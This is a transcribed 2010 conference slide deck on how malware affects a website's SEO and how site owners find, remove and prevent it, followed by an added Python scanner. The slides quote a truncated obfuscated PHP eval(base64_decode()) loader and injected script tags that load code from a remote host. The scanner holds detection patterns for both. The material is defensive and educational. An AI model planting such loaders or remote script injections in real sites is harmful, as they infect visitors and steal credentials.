2010 11 pubcon_hendison-hosting


Scott Hendison's Pubcon 2010 presentation on web hosting and SEO

Published in: Technology, Design

  1. 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  2. 2. About Scott Hendison • Began “hosting” websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op” a few years ago, all in the same local facility in Gresham, Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  3. 3. Web Hosting and SEO • I've been on this panel three times and discussed – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
  4. 4. Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced it the next day • Not a risky prediction, considering AdWords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
  5. 5. But I’m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
  6. 6. Malware
  7. 7. Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
  8. 8. Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
  9. 9. Malware • Identification • Removal • Prevention
  10. 10. Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
  11. 11. Malware Warnings
  12. 12. Warnings in the SERPS!
  13. 13. Interstitial Page
  14. 14. #1 Conversion Killer • Nothing hurts you more than if people won’t come to your site in the first place. • Once you’ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
  15. 15. Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
  16. 16. Removal
  17. 17. Removal
  18. 18. Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don’t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
  19. 19. Removal <?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY <snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203 Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK CRfUE9TVFsnZSddKSk7')); ?> (<snipped> goes on for dozens of lines )
  20. 20. Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
  21. 21. Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up” but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  22. 22. Once You’re Clean
  23. 23. Once You’re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
  24. 24. Once You’re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
  25. 25. Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
  26. 26. Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
  27. 27. Prevention • Nearly 8% of all sites are now WordPress* • We work in WordPress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said by Matt Mullenweg at one of the 2010 WordCamps, but I can’t prove it.
  28. 28. Prevention
  29. 29. Prevention
  30. 30. Prevention
  31. 31. Prevention
  32. 32. Prevention • Total prevention may be impossible. Be prepared! • Backup restoration is sometimes faster than repair • Hosts may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the web host’s fault!
  33. 33. Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
  34. 34. Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com
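
The file search from the Removal slides (18 to 21), as an added example that is not part of the original presentation: a Python scan for the `eval(base64_decode(` loader and for `<script src=` tags pointing at hosts you do not recognize, noting whether each flagged file changed recently. The host allowlist, the 30-day window, the function names and the sample site built in `demo()` are assumptions made for illustration.

```python
import os, re, tempfile, time
from pathlib import Path

SCAN_EXT = {".php", ".html", ".htm", ".js"}   # types named on the slides, plus .js
EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)
SCRIPT_SRC = re.compile(
    r"<script[^>]*?\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)

def scan_text(text, allowed_hosts):
    """Return findings for one file: the eval/base64 loader, unknown script hosts."""
    findings = []
    if EVAL_B64.search(text):
        findings.append("eval(base64_decode(")
    for host in sorted({h.lower() for h in SCRIPT_SRC.findall(text)}):
        if host not in allowed_hosts:            # allowlist is an assumption
            findings.append("script host " + host)
    return findings

def scan_tree(root, allowed_hosts, recent_days=30):
    """Map relative path -> (findings, changed_recently) for every flagged file."""
    cutoff = time.time() - recent_days * 86400
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_EXT:
            continue
        findings = scan_text(path.read_text(errors="replace"), allowed_hosts)
        if findings:
            rel = path.relative_to(root).as_posix()
            report[rel] = (findings, path.stat().st_mtime >= cutoff)
    return report

def demo():
    """Scan a constructed three-file site; contents are made up for the example."""
    bad = "<script src=http://domainX.ac.jp/course/VIVID.php ></script>"
    files = {
        "index.php": "<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n<h1>Home</h1>",
        "js/menu.js": "document.write('" + bad + "');",
        "about.html": '<script src="https://cdn.example.com/lib.js"></script>',
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in files.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        old = time.time() - 90 * 86400           # make index.php look long unchanged
        os.utime(Path(root, "index.php"), (old, old))
        return scan_tree(root, allowed_hosts={"cdn.example.com"})

if __name__ == "__main__":
    for name, (findings, recent) in demo().items():
        print(name, findings, "recent" if recent else "old")
```

The constructed `index.php` is flagged even though its change date is old, which is why the date check on slide 18 works as a hint for where to look first and not as a filter.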